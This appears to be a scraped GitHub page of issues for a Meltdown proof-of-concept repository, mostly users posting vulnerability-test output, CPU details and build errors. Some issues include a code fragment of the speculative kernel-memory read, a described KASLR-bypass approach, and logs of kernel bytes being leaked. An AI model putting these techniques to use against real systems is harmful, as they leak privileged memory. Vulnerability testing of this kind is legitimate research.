paboldin / meltdown-exploit Goto Github PK
View Code? Open in Web Editor NEWMeltdown Exploit PoC
meltdown-exploit's People
Contributors
Stargazers
Watchers
Forkers
scottjw droberson 0x43f shekkbuilder douyamv drizzlerisk ethan1986 martinycleung banana513a rocklee104 mel0day wuyasec brianwrf wbowling ashr ww9210 d3viluke taiji-xo bkerler backupsofdou4cc annmuor josejamilena gattofurbo990 eduriel madwind76 own2pwn liuxzheng steely-glint shaheemirza xiaoaiwhc erebus01 chenlong828 utf8everywhere andriymoroz lovesuae madtrapper iogr marcosnk dlat voidpx marcfurlong mieitza tudela c002 artpol84 koder-ua renansj snyiu100 planet15 knooow jiazhang0 kokokruunch ariky0099 denisse-dev securycore demonsec666 sunlinjin dlenski hanjun-guo crixalis2013 hritik14 0xkernel cikgufatah ykanello guiying212 louis-xer monniaux themushrr00m dillonfzw randomeval ghosthamlet heruix mehrdad-shokri bruceleo1969 whb224117 becavalier cheewaphat 0xsunsama gitty8 goghcrow blankaiwang zldww2011 jonazz747 pharaoh1 johnjojo53 abazhaniuk kesuskim xbalien m00zh33 deelmind dshtanger owl129 bluekezhou sjy-nankai moriarty2016 xpulsar zenzue anhkggfork raul1718 burningcodesmeltdown-exploit's Issues
Does not build on 64bit gcc 4.7.2
# gcc -O0 -std=gnu99 -msse2 meltdown.c -o meltdown
meltdown.c: In function ‘speculate’:
meltdown.c:61:19: error: memory input 0 is not directly addressable
will not work on Manjaro Linux
Hello,
wann try on Manjaro Linux but looks did not work.
$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
++ find_linux_proc_banner /proc/kallsyms sudo
++ sudo sed -n -re 's/^([0-9a-f][1-9a-f][0-9a-f]) .* linux_proc_banner$/\1/p' /proc/kallsyms
[sudo] Passwort für user01:
- linux_proc_banner=
- set +x
not found. reading /boot/System.map-4.4.109-2-MANJARO
+++ uname -r
++ find_linux_proc_banner /boot/System.map-4.4.109-2-MANJARO sudo
++ sudo sed -n -re 's/^([0-9a-f][1-9a-f][0-9a-f]) .* linux_proc_banner$/\1/p' /boot/System.map-4.4.109-2-MANJARO
sed: /boot/System.map-4.4.109-2-MANJARO kann nicht gelesen werden: Datei oder Verzeichnis nicht gefunden - linux_proc_banner=
- set +x
not found. reading /boot/System.map
++ find_linux_proc_banner /boot/System.map sudo
++ sudo sed -n -re 's/^([0-9a-f][1-9a-f][0-9a-f]) .* linux_proc_banner$/\1/p' /boot/System.map
sed: /boot/System.map kann nicht gelesen werden: Datei oder Verzeichnis nicht gefunden - linux_proc_banner=
- set +x
can't find linux_proc_banner, unable to test at all
$ uname -a
Linux spg006936 4.4.109-2-MANJARO #1 SMP PREEMPT Thu Jan 4 03:18:20 UTC 2018 x86_64 GNU/Linux
Here are the files in /boot, there is no .map file
$ ls -la /boot/
insgesamt 45808
drwxr-xr-x 7 root root 1024 9. Jan 06:20 .
drwxr-xr-x 17 root root 4096 4. Dez 07:32 ..
drwxr-xr-x 3 root root 1024 13. Jul 2015 EFI
drwxr-xr-x 6 root root 1024 9. Jan 06:23 grub
-rw-r--r-- 1 root root 28111482 9. Jan 06:23 initramfs-4.4-x86_64-fallback.img
-rw-r--r-- 1 root root 12425312 9. Jan 06:23 initramfs-4.4-x86_64.img
-rw-r--r-- 1 root root 1586688 18. Nov 20:44 intel-ucode.img
-rw-r--r-- 1 root root 22 4. Jan 04:19 linux44-x86_64.kver
drwx------ 2 root root 12288 21. Sep 2015 lost+found
drwxr-xr-x 2 root root 1024 22. Aug 2016 memtest86+
drwxr-xr-x 2 root root 1024 7. Mär 2017 syslinux
-rw-r--r-- 1 root root 4569408 4. Jan 04:19 vmlinuz-4.4-x86_64
VULNERABLE ON
looking for linux_proc_banner in /proc/kallsyms
cached = 35, uncached = 279, threshold 98
read ffffffff8164d080 = 25 % (score=303/1000)
read ffffffff8164d081 = 73 s (score=219/1000)
read ffffffff8164d082 = 20 (score=258/1000)
read ffffffff8164d083 = 76 v (score=333/1000)
read ffffffff8164d084 = 65 e (score=358/1000)
read ffffffff8164d085 = 72 r (score=348/1000)
read ffffffff8164d086 = 73 s (score=349/1000)
read ffffffff8164d087 = 69 i (score=214/1000)
read ffffffff8164d088 = 6f o (score=262/1000)
read ffffffff8164d089 = 6e n (score=297/1000)
read ffffffff8164d08a = 20 (score=314/1000)
read ffffffff8164d08b = 25 % (score=303/1000)
read ffffffff8164d08c = 73 s (score=324/1000)
read ffffffff8164d08d = 20 (score=252/1000)
read ffffffff8164d08e = 28 ( (score=279/1000)
read ffffffff8164d08f = 62 b (score=327/1000)
VULNERABLE
PLEASE POST THIS TO #19
VULNERABLE ON
3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 62
model name : Intel(R) Xeon(R) CPU E5-2420 v2 @ 2.20GHz
stepping : 4
microcode : 0x428
cpu MHz : 2199.914
cache size : 15360 KB
physical id : 0
Check if the kernel is patched against Meltdown
Linux 4.14.0-3 is patched against Meltdown, resulting in my CPU not being marked as vulnerable anymore.
NOT VULNERABLE ON
4.14.0-3-amd64 #1 SMP Debian 4.14.13-1 (2018-01-14) unknown
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Core(TM) i5-4690 CPU @ 3.50GHz
stepping : 3
microcode : 0x23
cpu MHz : 3171.998
cache size : 6144 KB
physical id : 0
I think that the program should check the kernel version and eventually inform the user that it's impossible to know if the CPU is really not vulnerable.
This would be useful especially because there are a lot of vulnerable CPUs reported in #22.
Need more details
It would be extremely useful if you were able to print out a
"This processor is vulnerable" and a "This processor is safe" message. It's not clear to me what the output means.
It would also be useful if we could pass in our own secret, to verify it is working properly.
Also, thank you for putting this together, there isn't much info out there on this.
Question regarding making and running on 32-bit CPU
Is it any reason to believe this test may not valid on a 32-bit cpu? I'm testing with a Libreboot'd Thinkpad X60 with a T2400(system is reporting an odd nonexistent cpu model number, likely because of Libreboot). I ask because the question was raised here and I'm not sure. I've seen that there was issues compiling at one point but that seems to be resolved and I had no issues when I did. Below is the complete output from running the script on 3 kernels that are on my system. Thanks for your time.
looking for linux_proc_banner in /proc/kallsyms
cached = 104, uncached = 424, threshold 209
read cb845060 = ff (score=0/1000)
read cb845061 = ff (score=0/1000)
read cb845062 = ff (score=0/1000)
read cb845063 = ff (score=0/1000)
read cb845064 = ff (score=0/1000)
read cb845065 = ff (score=0/1000)
read cb845066 = ff (score=0/1000)
read cb845067 = ff (score=0/1000)
read cb845068 = ff (score=0/1000)
read cb845069 = ff (score=0/1000)
read cb84506a = ff (score=0/1000)
read cb84506b = ff (score=0/1000)
read cb84506c = ff (score=0/1000)
read cb84506d = ff (score=0/1000)
read cb84506e = ff (score=0/1000)
read cb84506f = ff (score=0/1000)
NOT VULNERABLE
PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/22
NOT VULNERABLE ON
4.10.0-35-generic #39-Ubuntu SMP Wed Sep 13 07:45:58 UTC 2017 i686
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 14
model name : Genuine Intel(R) CPU 1400 @ 1.83GHz
stepping : 8
cpu MHz : 1833.000
cache size : 2048 KB
physical id : 0
siblings : 2
looking for linux_proc_banner in /proc/kallsyms
cached = 103, uncached = 432, threshold 210
read cc84a060 = ff (score=0/1000)
read cc84a061 = ff (score=0/1000)
read cc84a062 = ff (score=0/1000)
read cc84a063 = ff (score=0/1000)
read cc84a064 = ff (score=0/1000)
read cc84a065 = ff (score=0/1000)
read cc84a066 = ff (score=0/1000)
read cc84a067 = ff (score=0/1000)
read cc84a068 = ff (score=0/1000)
read cc84a069 = ff (score=0/1000)
read cc84a06a = ff (score=0/1000)
read cc84a06b = ff (score=0/1000)
read cc84a06c = ff (score=0/1000)
read cc84a06d = ff (score=0/1000)
read cc84a06e = ff (score=0/1000)
read cc84a06f = ff (score=0/1000)
NOT VULNERABLE
PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/22
NOT VULNERABLE ON
4.13.0-31-generic #34-Ubuntu SMP Fri Jan 19 16:34:16 UTC 2018 i686
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 14
model name : Genuine Intel(R) CPU 1400 @ 1.83GHz
stepping : 8
cpu MHz : 1833.000
cache size : 2048 KB
physical id : 0
siblings : 2
looking for linux_proc_banner in /proc/kallsyms
cached = 104, uncached = 433, threshold 212
read db86e060 = ff (score=0/1000)
read db86e061 = ff (score=0/1000)
read db86e062 = ff (score=0/1000)
read db86e063 = ff (score=0/1000)
read db86e064 = ff (score=0/1000)
read db86e065 = ff (score=0/1000)
read db86e066 = ff (score=0/1000)
read db86e067 = ff (score=0/1000)
read db86e068 = ff (score=0/1000)
read db86e069 = ff (score=0/1000)
read db86e06a = ff (score=0/1000)
read db86e06b = ff (score=0/1000)
read db86e06c = ff (score=0/1000)
read db86e06d = ff (score=0/1000)
read db86e06e = ff (score=0/1000)
read db86e06f = ff (score=0/1000)
NOT VULNERABLE
PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/22
NOT VULNERABLE ON
4.14.15-041415-generic #201801231530 SMP Tue Jan 23 20:51:49 UTC 2018 i686
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 14
model name : Genuine Intel(R) CPU 1400 @ 1.83GHz
stepping : 8
cpu MHz : 1828.847
cache size : 2048 KB
physical id : 0
siblings : 2
Doesn't build on gcc 4.4.7
cc meltdown.o -o meltdown
meltdown.o: In function `check':
meltdown.c:(.text+0x803): undefined reference to `__rdtscp'
meltdown.c:(.text+0x81f): undefined reference to `__rdtscp'
meltdown.o: In function `main':
meltdown.c:(.text+0x9da): undefined reference to `__rdtscp'
meltdown.c:(.text+0x9f2): undefined reference to `__rdtscp'
meltdown.c:(.text+0xa1a): undefined reference to `__rdtscp'
meltdown.o:meltdown.c:(.text+0xa35): more undefined references to `__rdtscp' follow
collect2: ld returned 1 exit status
make: *** [meltdown] Error 1
g++ --version
g++ (GCC) 4.4.7 20120313 (Red Hat 4.4.7-18)
Copyright (C) 2010 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.```
Linux kernel version
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
- find_linux_proc_banner /proc/kallsyms sudo
- sudo sed -n -re s/^([0-9a-f][1-9a-f][0-9a-f]) .* linux_proc_banner$/\1/p /proc/kallsyms
- linux_proc_banner=ffffffffbcc000a0
- set +x
cached = 31, uncached = 348, threshold 103
read ffffffffbcc000a0 = ff (score=0/1000)
read ffffffffbcc000a1 = ff (score=0/1000)
read ffffffffbcc000a2 = ff (score=0/1000)
read ffffffffbcc000a3 = ff (score=0/1000)
read ffffffffbcc000a4 = ff (score=0/1000)
read ffffffffbcc000a5 = ff (score=0/1000)
read ffffffffbcc000a6 = ff (score=0/1000)
read ffffffffbcc000a7 = ff (score=0/1000)
read ffffffffbcc000a8 = ff (score=0/1000)
read ffffffffbcc000a9 = ff (score=0/1000)
read ffffffffbcc000aa = ff (score=0/1000)
read ffffffffbcc000ab = ff (score=0/1000)
read ffffffffbcc000ac = ff (score=0/1000)
read ffffffffbcc000ad = ff (score=0/1000)
read ffffffffbcc000ae = ff (score=0/1000)
read ffffffffbcc000af = ff (score=0/1000)
NOT VULNERABLE
PLEASE POST THIS TO #22
NOT VULNERABLE ON
4.13.0-25-generic #29-Ubuntu SMP Mon Jan 8 21:14:41 UTC 2018 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 63
model name : Intel(R) Core(TM) i7-5930K CPU @ 3.50GHz
stepping : 2
microcode : 0x3b
cpu MHz : 4374.956
cache size : 15360 KB
physical id : 0
Non-vulnerable CPU/kernels list
Linux kernel version
any
CPU
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 28
model name : Intel(R) Atom(TM) CPU 330 @ 1.60GHz
stepping : 2
microcode : 0x213
cpu MHz : 1600.080
cache size : 512 KB
physical id : 0
Reason
Unaffected because of missing vulnerable branch predictor
Linux kernel version
3.0.8-svn4804 #1 SMP PREEMPT Tue Jan 15 10:12:01 CST 2013 unknown (Android 4.0.3/32 bit)
CPU
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 39
model name : Intel(R) Atom(TM) CPU Z2460 @ 1.60GHz
stepping : 2
cpu MHz : 600.000
cache size : 512 KB
physical id : 0
siblings : 2
Reason
Unknown, theoretically should be affected according to Intel.
VULNERABLE ON
VULNERABLE ON
4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) unknown
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Core(TM)2 Duo CPU T5750 @ 2.00GHz
stepping : 13
microcode : 0xa3
cpu MHz : 2000.000
cache size : 2048 KB
physical id : 0
Intel told me this system was not vulnerable, but your tool says it is
Intel has a webpage listing all the Intel CPUs that Intel thinks are affected by Spectre and Meltdown. Rather desperately, searching the web for that page (which I saw once) does not find it and various news sites that have reported on it (e.g. this one) should be ashamed of themselves for not giving a link to the original.
Anyhow, my Dell D830's Intel Core2 Duo CPU T7500 processor is not on the list. I wrote to Intel and was assured, twice, of the following. To the best of the company's knowledge - which the webpage giving the list admits is incomplete - that CPU is not vulnerable. However, your tool, and this one, say that it is.
EDIT: here's the complete output from your program.
$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo sed -n -re s/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p /proc/kallsyms
[sudo] password for nicholas:
+ linux_proc_banner=ffffffff98c00060
+ set +x
cached = 65, uncached = 380, threshold 157
read ffffffff98c00060 = 25 % (score=939/1000)
read ffffffff98c00061 = 73 s (score=969/1000)
read ffffffff98c00062 = 20 (score=982/1000)
read ffffffff98c00063 = 76 v (score=994/1000)
read ffffffff98c00064 = 65 e (score=978/1000)
read ffffffff98c00065 = 72 r (score=987/1000)
read ffffffff98c00066 = 73 s (score=964/1000)
read ffffffff98c00067 = 69 i (score=981/1000)
read ffffffff98c00068 = 6f o (score=979/1000)
read ffffffff98c00069 = 6e n (score=956/1000)
read ffffffff98c0006a = 20 (score=973/1000)
read ffffffff98c0006b = 25 % (score=962/1000)
read ffffffff98c0006c = 73 s (score=959/1000)
read ffffffff98c0006d = 20 (score=968/1000)
read ffffffff98c0006e = 28 ( (score=967/1000)
read ffffffff98c0006f = 6b k (score=961/1000)
VULNERABLE
PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/19
VULNERABLE ON
4.14.13-041413-generic #201801101001 SMP Wed Jan 10 10:02:53 UTC 2018 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Core(TM)2 Duo CPU T7500 @ 2.20GHz
stepping : 10
microcode : 0x95
cpu MHz : 2204.898
cache size : 4096 KB
physical id : 0
Further EDIT: I have the 4.14.13-041413-generic kernel (running Linux Mint x64 Cinnamon 18.3) but, for the moment I have the kernel mitigations disabled via a grub switch.
false positive due to missing System.map ? (ie. awk: fatal: cannot open file ) AND using same exit code of 1 for usage() and vulnerable detection
$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
../run.sh:18+ find_linux_proc_banner /proc/kallsyms sudo
../run.sh:4+ sudo awk '
/linux_proc_banner/ {
if (strtonum("0x"$1))
print $1;
exit 0;
}' /proc/kallsyms
[sudo] password for xftroxgpx:
./run.sh:18+ linux_proc_banner=
./run.sh:20+ set +x
not found. reading /boot/System.map-4.15.0-rc5-g2758b3e3e630
.../run.sh:26+ uname -r
../run.sh:26+ find_linux_proc_banner /boot/System.map-4.15.0-rc5-g2758b3e3e630 sudo
../run.sh:4+ sudo awk '
/linux_proc_banner/ {
if (strtonum("0x"$1))
print $1;
exit 0;
}' /boot/System.map-4.15.0-rc5-g2758b3e3e630
awk: fatal: cannot open file `/boot/System.map-4.15.0-rc5-g2758b3e3e630' for reading (No such file or directory)
./run.sh:26+ linux_proc_banner=
./run.sh:27+ set +x
./meltdown: [hexaddr] [size]
VULNERABLE ON
4.15.0-rc5-g2758b3e3e630 #172 SMP PREEMPT Sat Dec 30 10:44:19 CET 2017 unknown
processor : 0
vendor_id : AuthenticAMD
cpu family : 18
model : 1
model name : AMD A6-3400M APU with Radeon(tm) HD Graphics
stepping : 0
microcode : 0x3000027
cpu MHz : 2269.781
cache size : 1024 KB
physical id : 0Vulnerable!
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 42
model name : Intel(R) Core(TM) i5-2410M CPU @ 2.30GHz
stepping : 7
cpu MHz : 2294.949
cache size : 3072 KB
physical id : 0
siblings : 1
i5-4690k Ubuntu 16.04.3
VULNERABLE ON
4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Core(TM) i5-4690K CPU @ 3.50GHz
stepping : 3
microcode : 0x19
cpu MHz : 3865.722
cache size : 6144 KB
physical id : 0
vulnerable i5
4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 78
model name : Intel(R) Core(TM) i5-6260U CPU @ 1.80GHz
stepping : 3
microcode : 0x8a
cpu MHz : 1899.984
cache size : 4096 KB
physical id : 0
Core(TM)2 Duo CPU T5800 @ 2.00GHz
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Core(TM)2 Duo CPU T5800 @ 2.00GHz
stepping : 13
microcode : 0xa4
cpu MHz : 1604.279
cache size : 2048 KB
physical id : 0
Not vulnerable
When I run this I get output like such
looking for linux_proc_banner in /proc/kallsyms
cached = 75, uncached = 451, threshold 183
read ffffffffa2c00060 = 20
read ffffffffa2c00061 = 20
read ffffffffa2c00062 = 20
read ffffffffa2c00063 = 43 C
read ffffffffa2c00064 = 20
read ffffffffa2c00065 = 20
read ffffffffa2c00066 = 20
read ffffffffa2c00067 = 20
read ffffffffa2c00068 = 20
read ffffffffa2c00069 = 20
read ffffffffa2c0006a = 20
read ffffffffa2c0006b = 20
read ffffffffa2c0006c = 20
read ffffffffa2c0006d = 20
read ffffffffa2c0006e = 20
read ffffffffa2c0006f = 20
NOT VULNERABLE
What does this mean? I'm fairly sure my CPU is vulnerable.
No linux_proc_banner in /proc/kallsyms
It looks like this PoC cannot be tested at all on my kernel since linux_proc_banner is not exposed at all on /proc/kallsyms
# uname -a
Linux laptix 4.9.48-maxux64 #8 SMP PREEMPT Mon Dec 4 20:12:14 CET 2017 x86_64 Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz GenuineIntel GNU/Linux
# grep linux_proc_banner /proc/kallsyms
#
Fedora 27 on Intel Core I5 - Dell virtual VMWare
looking for linux_proc_banner in /proc/kallsyms
cached = 31, uncached = 254, threshold 88
read ffffffffbbe00060 = ff (score=0/1000)
read ffffffffbbe00061 = ff (score=0/1000)
read ffffffffbbe00062 = ff (score=0/1000)
read ffffffffbbe00063 = ff (score=0/1000)
read ffffffffbbe00064 = ff (score=0/1000)
read ffffffffbbe00065 = ff (score=0/1000)
read ffffffffbbe00066 = ff (score=0/1000)
read ffffffffbbe00067 = ff (score=0/1000)
read ffffffffbbe00068 = ff (score=0/1000)
read ffffffffbbe00069 = ff (score=0/1000)
read ffffffffbbe0006a = ff (score=0/1000)
read ffffffffbbe0006b = ff (score=0/1000)
read ffffffffbbe0006c = ff (score=0/1000)
read ffffffffbbe0006d = ff (score=0/1000)
read ffffffffbbe0006e = ff (score=0/1000)
read ffffffffbbe0006f = ff (score=0/1000)
NOT VULNERABLE
PLEASE POST THIS TO #22
NOT VULNERABLE ON
4.14.11-300.fc27.x86_64 #1 SMP Wed Jan 3 13:52:28 UTC 2018 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 62
model name : Intel(R) Xeon(R) CPU E5-2660 v2 @ 2.20GHz
stepping : 4
microcode : 0x42a
cpu MHz : 2200.000
cache size : 25600 KB
physical id : 0
continue.... root cause...
@paboldin CPU translate a virtual address through MMU unit that would resolve where the virtual memory is in the physical memory space(cache, main memory, etc) and check the privilege. I suppose that these two action should always be carried out simultaneously. So as you said in the scenario of L1 cache fetch, only data value is cached in L1 while the privilege information is not cached? If not cached, then it makes sense that a racing situation can happen. If cached, there should be another deep reason for meltdown.
Sometimes says my system is not vulnerable
I have a Xeon X5675 on an unpatched system. This CPU is known to be vulnerable.
I have to run ./run.sh several times before it detects my system as vulnerable. Meanwhile, every time I run it tells me to submit my CPU to the not-vulnerable bug. :-/
Should ./meltdown should be run with a value larger than 10? I've tried 40 (catches 30% of the time) as well as 100 (catches it 50% of the time).
Explains about little assembly code
Dears
Could you please explain why this code snipet is necessary on speculate function?
".rept 300\n\t"
"add $0x141, %%rax\n\t"
".endr\n\t"
Thank you a lot!
compile error on SuSE Enterprise 11 SP4 - x86intrin.h: No such file or directory
make
cc -O2 -msse2 -c -o meltdown.o meltdown.c
meltdown.c:11:23: error: x86intrin.h: No such file or directory
meltdown.c: In function ‘main’:
meltdown.c:296: warning: incompatible implicit declaration of built-in function ‘exit’
make: *** [meltdown.o] Error 1
make CFLAGS=-DHAVE_RDTSCP=0 clean all
rm -f meltdown.o meltdown
cc -DHAVE_RDTSCP=0 -c -o meltdown.o meltdown.c
meltdown.c:11:23: error: x86intrin.h: No such file or directory
meltdown.c: In function ‘main’:
meltdown.c:296: warning: incompatible implicit declaration of built-in function ‘exit’
make: *** [meltdown.o] Error 1
gcc 4.3.4
GNU Make 3.81
again 32bit: inlining failed in call to always_inline ‘_mm_mfence’
MAKE TRACE:
rm -f meltdown.o meltdown
cc -DHAVE_RDTSCP=0 -c -o meltdown.o meltdown.c
In file included from /usr/lib/gcc/i586-linux-gnu/4.9/include/xmmintrin.h:1258:0,
from /usr/lib/gcc/i586-linux-gnu/4.9/include/x86intrin.h:31,
from meltdown.c:11:
meltdown.c: In function ‘get_access_time’:
/usr/lib/gcc/i586-linux-gnu/4.9/include/emmintrin.h:1471:1: error: inlining failed in call to always_inline ‘_m$
_mm_mfence (void)
^
meltdown.c:102:2: error: called from here
_mm_mfence();
^
: recipe for target 'meltdown.o' failed
make: *** [meltdown.o] Error 1
GCC VERSION:
gcc (Debian 4.9.2-10) 4.9.2
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
PROCESSOR:
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Core(TM)2 Duo CPU T7300 @ 2.00GHz
stepping : 10
microcode : 0x92
cpu MHz : 800.000
cache size : 4096 KB
physical id : 0
KERNEL:
Debian patched 4.9.65
Suggestion: add another standard location of System.map
I think it would make sense to add one more location where System.map is looked for:
/lib/modules/$(uname -r)/build/System.map. That is where it usually resides on systems where the kernel has been built and installed from source.
Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz
NOT VULNERABLE ON
4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 158
model name : Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz
stepping : 9
microcode : 0x8e
cpu MHz : 3738.135
cache size : 6144 KB
physical id : 0
it doesn't really work with other memory address than that is in the PoC
can you please explain why?
root@debian:~/meltdown-exploit# dd if=/dev/mem bs=1M of=/tmp/test.bin
dd: error reading '/dev/mem': Bad address
512+0 records in
512+0 records out
536870912 bytes (537 MB, 512 MiB) copied, 75.8464 s, 7.1 MB/s
root@debian:~/meltdown-exploit# hexdump -C /tmp/test.bin | grep "version %s"
00823930 76 65 72 73 69 6f 6e 20 25 73 20 28 72 7c 20 20 |version %s (r| |
008fd1f0 76 65 72 73 69 6f 6e 20 25 73 20 28 72 7c 20 20 |version %s (r| |
008fd280 76 65 72 73 69 6f 6e 20 25 73 22 20 20 20 20 20 |version %s" |
01800060 25 73 20 76 65 72 73 69 6f 6e 20 25 73 20 28 72 |%s version %s (r|
root@debian:~/meltdown-exploit# ./meltdown 0xffff880001800060 4
cached = 28, uncached = 203, threshold 75
read ffff880001800060 = 25 % (score=15302/100000)
read ffff880001800061 = 73 s (score=15468/100000)
read ffff880001800062 = 20 (score=3372/100000)
read ffff880001800063 = 76 v (score=15442/100000)
VULNERABLE
root@debian:~/meltdown-exploit# ./meltdown 0xffff8800008fd280 4
cached = 40, uncached = 201, threshold 89
read ffff8800008fd280 = ff (score=0/100000)
read ffff8800008fd281 = ff (score=0/100000)
read ffff8800008fd282 = ff (score=0/100000)
read ffff8800008fd283 = ff (score=0/100000)
NOT VULNERABLE
VULNERABLE ON
4.14.0-0.bpo.2-amd64 #1 SMP Debian 4.14.7-1~bpo9+1 (2017-12-22) unknown
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 142
model name : Intel(R) Core(TM) i7-7Y75 CPU @ 1.30GHz
stepping : 9
microcode : 0x70
cpu MHz : 1601.000
cache size : 4096 KB
physical id : 0
VPS
NOT VULNERABLE ON
4.4.0-109-generic #132-Ubuntu SMP Tue Jan 9 19:52:39 UTC 2018 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 44
model name : Westmere E56xx/L56xx/X56xx (Nehalem-C)
stepping : 1
microcode : 0x1
cpu MHz : 2299.998
cache size : 4096 KB
physical id : 0
Details about my notebook.
Linux 4.8.0-59-generic #64-Ubuntu SMP Thu Jun 29 19:38:34 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
VULNERABLE ON
4.8.0-59-generic #64-Ubuntu SMP Thu Jun 29 19:38:34 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 61
model name : Intel(R) Core(TM) i3-5005U CPU @ 2.00GHz
stepping : 4
microcode : 0x24
cpu MHz : 1899.902
cache size : 3072 KB
physical id : 0
Issue 19
VULNERABLE ON
4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) unknown
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 58
model name : Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz
stepping : 9
microcode : 0x1b
cpu MHz : 2501.000
cache size : 3072 KB
physical id : 0
VULNERABLE ON
VULNERABLE ON
4.4.0-104-generic #127~14.04.1-Ubuntu SMP Mon Dec 11 12:44:15 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
stepping : 3
microcode : 0x19
cpu MHz : 3288.500
cache size : 6144 KB
physical id : 0
Is there another way to fully cache the target memory without using pread()?
In your code, you use pread() to cache the linux_proc_banner. I'm wondering if there is another way to do that? You mentioned that this could work with prefetch or sched_yield. I tried to replace the pread(fd, buf, sizeof(buf), 0) with _mm_prefetch((char*)addr, 0) and it doesn't work.
Can you show me the alternative way? Thanks!
Misleading info in the docs (correct me I may be wrong)
"Based on spec.c from spectre paper https://spectreattack.com/spectre.pdf and blog post"
But this is Meltdown one right because Spectre doesn't read kernel space from userspace, it just can read memory leaks from primary memory of other users.
Confusion about part of the assembly code.
I have managed to get rid of the assembly code and using C code to trigger meltdown, but I still need part of the assembly code you wrote which is not directly related to Meltdown to make this work. See my code below:
void meltdown_asm(unsigned long kernel_data_addr)
{
char kernel_data = 0;
// ??? give the algorithmic units something to chew
asm volatile(
".rept 400;"
"add $0x141, %%eax;"
".endr;"
:
:
: "eax"
);
kernel_data = *(char*)kernel_data_addr;
array[kernel_data * 4096] += 83;
}
The kernel data is in the cache. I have done some experiments and found out the inline assembly code that keeps EAX busy is critical. In another issue post, you said:"give the algorithmic units something to chew while memory access is being speculated". In my understanding, while CPU executing the dummy asm code, since the memory fetching units are idle, they would out-of-orderly fetch the kernel data ahead, which increase the possibility of success. Is my understanding correct? Many thanks!
My setup is Ubuntu 16.04 32bit VM running on i7-6600u.
Meltdown as KASLR bypass
Can't defeat KASLR yet, so you may need to enter your password to find
linux_proc_bannerin the/proc/kallsyms(or do it manually).
Here's a modified version of meltdown.c using an extremely simplistic implementation (lazy hack) to find the kernel virtual address space, from which the base address can be inferred, without requiring root privileges (x86_64 only). Leaving this here in case it is useful.
Given the size of the kernel, and that the kernel is aligned, it is reasonable to expect that some symbols (such as debug or linux_proc_banner) can be found within the first ~100 bytes while iterating over the potential kernel virtual address space.
This technique iterates with a step of 0x100000, across the kernel virtual address space 0xffffffff80000000 to 0xffffffffffffffff [1], and checks the first 100 bytes for debug or linux_proc_banner.
Possibly the laziest and slowest approach possible. It is not efficient. It is not optimized. It does not implement the techniques in the paper.
Also, not that the printed offset may be off by a couple of bytes. I cared only about locating the kernel, not the exact offset.
Usage: ./a.out <start address> <number of bytes to search>
Depending on the target kernel, a faster technique may be to modify the hard-coded step to iterate 0x1000000 (rather than 0x100000) using offset a00000; ie: ./a.out 0xffffffff80a00000 100.
Ubuntu 16.04 (4.4.0-21-generic)
test@ubuntu-16-04-x64:~/Desktop/meltdown-exploit$ time ./a.out 0xffffffff80000000 100
cached = 65, uncached = 285, threshold 136
read ffffffff80000000 = ff (score=0/1000)
read ffffffff80000001 = ff (score=0/1000)
read ffffffff80000002 = ff (score=0/1000)
read ffffffff80000003 = ff (score=0/1000)
read ffffffff80000004 = ff (score=0/1000)
read ffffffff80000005 = ff (score=0/1000)
read ffffffff80000006 = ff (score=0/1000)
read ffffffff80000007 = ff (score=0/1000)
read ffffffff80000008 = ff (score=0/1000)
read ffffffff80000009 = ff (score=0/1000)
